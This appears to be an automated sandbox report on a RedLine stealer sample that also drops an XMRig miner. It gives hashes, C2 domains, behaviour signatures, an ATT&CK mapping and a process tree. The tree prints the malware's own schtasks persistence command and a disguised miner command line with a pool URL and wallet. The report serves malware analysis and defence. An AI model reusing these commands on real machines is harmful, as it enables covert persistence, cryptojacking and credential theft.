Analysis

  • max time kernel
    149s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    25-08-2021 08:09

General

  • Target

    c9da2adf58898fe1cdd9c8318347ad9f4f71c67e3426c3eeec365bccf5f53088.exe

  • Size

    234KB

  • MD5

    be33a8818cc056d5f773c8d0d7367419

  • SHA1

    9e8b10e0fa182ba77d5cd696ed7353cd6be82349

  • SHA256

    c9da2adf58898fe1cdd9c8318347ad9f4f71c67e3426c3eeec365bccf5f53088

  • SHA512

    9205cb33ae340225c541db517721085e6ddf5281bafa60f3ddfbaaefc33423a2ea97adbf3a7d684ba59ca20e01224e726ad33cf1ce035070fbecb4515cd0d78f

Malware Config

Extracted

Family

redline

Botnet

3

C2

deyrolorme.xyz:80

xariebelal.xyz:80

anihelardd.xyz:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9da2adf58898fe1cdd9c8318347ad9f4f71c67e3426c3eeec365bccf5f53088.exe
    "C:\Users\Admin\AppData\Local\Temp\c9da2adf58898fe1cdd9c8318347ad9f4f71c67e3426c3eeec365bccf5f53088.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3724
    • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
      "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:200
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:3196
      • C:\Users\Admin\AppData\Roaming\services64.exe
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2708
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:812
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:3944
        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
          4⤵
          • Executes dropped EXE
          PID:3180
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.admin/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BOVf8GOEpqsYJf392VKwN2gwsZ1d06Df9J2hBJw9kUq" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3696
    • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 3.exe
      "C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 3.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Users\Admin\AppData\Roaming\8603535.exe
        "C:\Users\Admin\AppData\Roaming\8603535.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3796
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3796 -s 2128
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3404
      • C:\Users\Admin\AppData\Roaming\5899289.exe
        "C:\Users\Admin\AppData\Roaming\5899289.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:940
        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
          4⤵
          • Executes dropped EXE
          PID:3936
      • C:\Users\Admin\AppData\Roaming\5454163.exe
        "C:\Users\Admin\AppData\Roaming\5454163.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3940

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Collection

Data from Local System

2
T1005

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
    MD5

    6d997a345651126bf81cfa573268ef6b

    SHA1

    04813a5732d71d719430e43c34eb5c6ad10695ab

    SHA256

    55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

    SHA512

    988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

  • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
    MD5

    6d997a345651126bf81cfa573268ef6b

    SHA1

    04813a5732d71d719430e43c34eb5c6ad10695ab

    SHA256

    55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

    SHA512

    988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

  • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 3.exe
    MD5

    1f755b7e45ad2318b398b1d6063cf3d9

    SHA1

    506410db7943b5f2a0657b2e1dd385070acda92e

    SHA256

    501a96ee5fad39b3148c60a59e50d409110faf8be68f089898443c427b91f765

    SHA512

    7f7a6c3ec9cc7789ebad20333e949c7f5492fa34761b99b2ab6d2f46796705cc3c63c0a91e080867204dd3f47322d9cbde35320959e2400c87078a05d9e0586c

  • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 3.exe
    MD5

    1f755b7e45ad2318b398b1d6063cf3d9

    SHA1

    506410db7943b5f2a0657b2e1dd385070acda92e

    SHA256

    501a96ee5fad39b3148c60a59e50d409110faf8be68f089898443c427b91f765

    SHA512

    7f7a6c3ec9cc7789ebad20333e949c7f5492fa34761b99b2ab6d2f46796705cc3c63c0a91e080867204dd3f47322d9cbde35320959e2400c87078a05d9e0586c

  • C:\Users\Admin\AppData\Roaming\5454163.exe
    MD5

    883fe31989c8dfc8f2e22a94ae2d369a

    SHA1

    2933d6fafbebe84c12c0e226bf182e708d3bd32e

    SHA256

    7781a758350e3fba94c86661171371a7fd19f0801bf4cc82c5c94169fed3b9b4

    SHA512

    c9d4ee4ba7e34c4641b25837295a8d7ea6c04f5d25facd9948bb19698e75a833e16f530d6be59fe6cb9d2c5771a1e7e10266adbb121ce1822e1048530e67e313

  • C:\Users\Admin\AppData\Roaming\5454163.exe
    MD5

    883fe31989c8dfc8f2e22a94ae2d369a

    SHA1

    2933d6fafbebe84c12c0e226bf182e708d3bd32e

    SHA256

    7781a758350e3fba94c86661171371a7fd19f0801bf4cc82c5c94169fed3b9b4

    SHA512

    c9d4ee4ba7e34c4641b25837295a8d7ea6c04f5d25facd9948bb19698e75a833e16f530d6be59fe6cb9d2c5771a1e7e10266adbb121ce1822e1048530e67e313

  • C:\Users\Admin\AppData\Roaming\5899289.exe
    MD5

    3598180fddc06dbd304b76627143b01d

    SHA1

    1d39b0dd8425359ed94e606cb04f9c5e49ed1899

    SHA256

    44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

    SHA512

    8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

  • C:\Users\Admin\AppData\Roaming\5899289.exe
    MD5

    3598180fddc06dbd304b76627143b01d

    SHA1

    1d39b0dd8425359ed94e606cb04f9c5e49ed1899

    SHA256

    44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

    SHA512

    8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

  • C:\Users\Admin\AppData\Roaming\8603535.exe
    MD5

    463bac4a842400e537500a5a20fbe6a8

    SHA1

    7ea66b11085e4b3626223e5573cae4c6ca421c89

    SHA256

    d20c700b389f6a95c9acb4b0401bbf6f7b24b6854e52d07ab05b05f4fd07d5da

    SHA512

    0fe50b8358d33df1564bc41aadc7f3f87c002517fbfbb1ae453a2c3ca89c8605cebde40ee17e130caf69b090be79dc9b0c7e6966bba1bbae3e02c6056518edc3

  • C:\Users\Admin\AppData\Roaming\8603535.exe
    MD5

    463bac4a842400e537500a5a20fbe6a8

    SHA1

    7ea66b11085e4b3626223e5573cae4c6ca421c89

    SHA256

    d20c700b389f6a95c9acb4b0401bbf6f7b24b6854e52d07ab05b05f4fd07d5da

    SHA512

    0fe50b8358d33df1564bc41aadc7f3f87c002517fbfbb1ae453a2c3ca89c8605cebde40ee17e130caf69b090be79dc9b0c7e6966bba1bbae3e02c6056518edc3

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    7f7246cca411275a62d7fdee50877859

    SHA1

    7e3a4e01f44ce712426a04fc2719ea7460304788

    SHA256

    989cd0b0c561c9a08e23574dd47d6b32273ecf778dfa222ec1db3865e56cac1b

    SHA512

    f11e8657593fd786a3f05566a60c71cd53e80a10ce3013f61d3a020d956a98d24ee598e1acb77ed87bee23fc217a3aeef068810aad636f17da473be8d3a2e1c7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    7f7246cca411275a62d7fdee50877859

    SHA1

    7e3a4e01f44ce712426a04fc2719ea7460304788

    SHA256

    989cd0b0c561c9a08e23574dd47d6b32273ecf778dfa222ec1db3865e56cac1b

    SHA512

    f11e8657593fd786a3f05566a60c71cd53e80a10ce3013f61d3a020d956a98d24ee598e1acb77ed87bee23fc217a3aeef068810aad636f17da473be8d3a2e1c7

  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    MD5

    3598180fddc06dbd304b76627143b01d

    SHA1

    1d39b0dd8425359ed94e606cb04f9c5e49ed1899

    SHA256

    44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

    SHA512

    8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    MD5

    3598180fddc06dbd304b76627143b01d

    SHA1

    1d39b0dd8425359ed94e606cb04f9c5e49ed1899

    SHA256

    44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

    SHA512

    8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

  • C:\Users\Admin\AppData\Roaming\services64.exe
    MD5

    6d997a345651126bf81cfa573268ef6b

    SHA1

    04813a5732d71d719430e43c34eb5c6ad10695ab

    SHA256

    55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

    SHA512

    988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

  • C:\Users\Admin\AppData\Roaming\services64.exe
    MD5

    6d997a345651126bf81cfa573268ef6b

    SHA1

    04813a5732d71d719430e43c34eb5c6ad10695ab

    SHA256

    55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

    SHA512

    988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

  • memory/200-176-0x0000000000000000-mapping.dmp
  • memory/812-186-0x0000000000000000-mapping.dmp
  • memory/940-144-0x0000000007BE0000-0x0000000007BE1000-memory.dmp
    Filesize

    4KB

  • memory/940-149-0x0000000007780000-0x0000000007781000-memory.dmp
    Filesize

    4KB

  • memory/940-134-0x0000000000000000-mapping.dmp
  • memory/940-137-0x0000000000A30000-0x0000000000A31000-memory.dmp
    Filesize

    4KB

  • memory/940-142-0x00000000051B0000-0x00000000051B6000-memory.dmp
    Filesize

    24KB

  • memory/2044-178-0x0000000000FD0000-0x0000000000FD2000-memory.dmp
    Filesize

    8KB

  • memory/2044-174-0x0000000000EF0000-0x0000000000EFA000-memory.dmp
    Filesize

    40KB

  • memory/2044-119-0x0000000000560000-0x0000000000561000-memory.dmp
    Filesize

    4KB

  • memory/2044-116-0x0000000000000000-mapping.dmp
  • memory/2044-175-0x0000000000F20000-0x0000000000F21000-memory.dmp
    Filesize

    4KB

  • memory/2212-126-0x0000000000B30000-0x0000000000B31000-memory.dmp
    Filesize

    4KB

  • memory/2212-128-0x0000000000B60000-0x0000000000B61000-memory.dmp
    Filesize

    4KB

  • memory/2212-120-0x0000000000000000-mapping.dmp
  • memory/2212-124-0x0000000000410000-0x0000000000411000-memory.dmp
    Filesize

    4KB

  • memory/2212-127-0x0000000000B40000-0x0000000000B5E000-memory.dmp
    Filesize

    120KB

  • memory/2212-143-0x000000001B170000-0x000000001B172000-memory.dmp
    Filesize

    8KB

  • memory/2708-179-0x0000000000000000-mapping.dmp
  • memory/2708-193-0x00000000010E0000-0x00000000010E2000-memory.dmp
    Filesize

    8KB

  • memory/3180-190-0x0000000000D60000-0x0000000000D61000-memory.dmp
    Filesize

    4KB

  • memory/3180-187-0x0000000000000000-mapping.dmp
  • memory/3180-194-0x000000001C930000-0x000000001C932000-memory.dmp
    Filesize

    8KB

  • memory/3196-177-0x0000000000000000-mapping.dmp
  • memory/3696-198-0x0000000140000000-0x0000000140763000-memory.dmp
    Filesize

    7.4MB

  • memory/3696-196-0x00000001402F327C-mapping.dmp
  • memory/3696-195-0x0000000140000000-0x0000000140763000-memory.dmp
    Filesize

    7.4MB

  • memory/3696-197-0x0000000000B90000-0x0000000000BB0000-memory.dmp
    Filesize

    128KB

  • memory/3696-201-0x0000000000BD0000-0x0000000000BF0000-memory.dmp
    Filesize

    128KB

  • memory/3696-202-0x00000000029F0000-0x0000000002A10000-memory.dmp
    Filesize

    128KB

  • memory/3724-114-0x0000000000680000-0x0000000000681000-memory.dmp
    Filesize

    4KB

  • memory/3796-146-0x000000001B890000-0x000000001B892000-memory.dmp
    Filesize

    8KB

  • memory/3796-132-0x0000000000CA0000-0x0000000000CA1000-memory.dmp
    Filesize

    4KB

  • memory/3796-141-0x0000000001310000-0x000000000135A000-memory.dmp
    Filesize

    296KB

  • memory/3796-129-0x0000000000000000-mapping.dmp
  • memory/3936-164-0x0000000004AA0000-0x0000000004AA1000-memory.dmp
    Filesize

    4KB

  • memory/3936-152-0x0000000000000000-mapping.dmp
  • memory/3936-163-0x0000000007310000-0x0000000007311000-memory.dmp
    Filesize

    4KB

  • memory/3940-160-0x0000000007AB0000-0x0000000007AB1000-memory.dmp
    Filesize

    4KB

  • memory/3940-167-0x0000000009100000-0x0000000009101000-memory.dmp
    Filesize

    4KB

  • memory/3940-166-0x0000000003050000-0x0000000003051000-memory.dmp
    Filesize

    4KB

  • memory/3940-162-0x0000000007AF0000-0x0000000007AF1000-memory.dmp
    Filesize

    4KB

  • memory/3940-173-0x0000000009D70000-0x0000000009D71000-memory.dmp
    Filesize

    4KB

  • memory/3940-157-0x0000000007A50000-0x0000000007A51000-memory.dmp
    Filesize

    4KB

  • memory/3940-171-0x0000000009770000-0x0000000009771000-memory.dmp
    Filesize

    4KB

  • memory/3940-165-0x0000000007C90000-0x0000000007C91000-memory.dmp
    Filesize

    4KB

  • memory/3940-151-0x0000000008040000-0x0000000008041000-memory.dmp
    Filesize

    4KB

  • memory/3940-150-0x0000000003060000-0x0000000003092000-memory.dmp
    Filesize

    200KB

  • memory/3940-147-0x0000000000C80000-0x0000000000C81000-memory.dmp
    Filesize

    4KB

  • memory/3940-168-0x0000000009800000-0x0000000009801000-memory.dmp
    Filesize

    4KB

  • memory/3940-169-0x00000000092D0000-0x00000000092D1000-memory.dmp
    Filesize

    4KB

  • memory/3940-139-0x0000000000000000-mapping.dmp
  • memory/3944-192-0x0000000000000000-mapping.dmp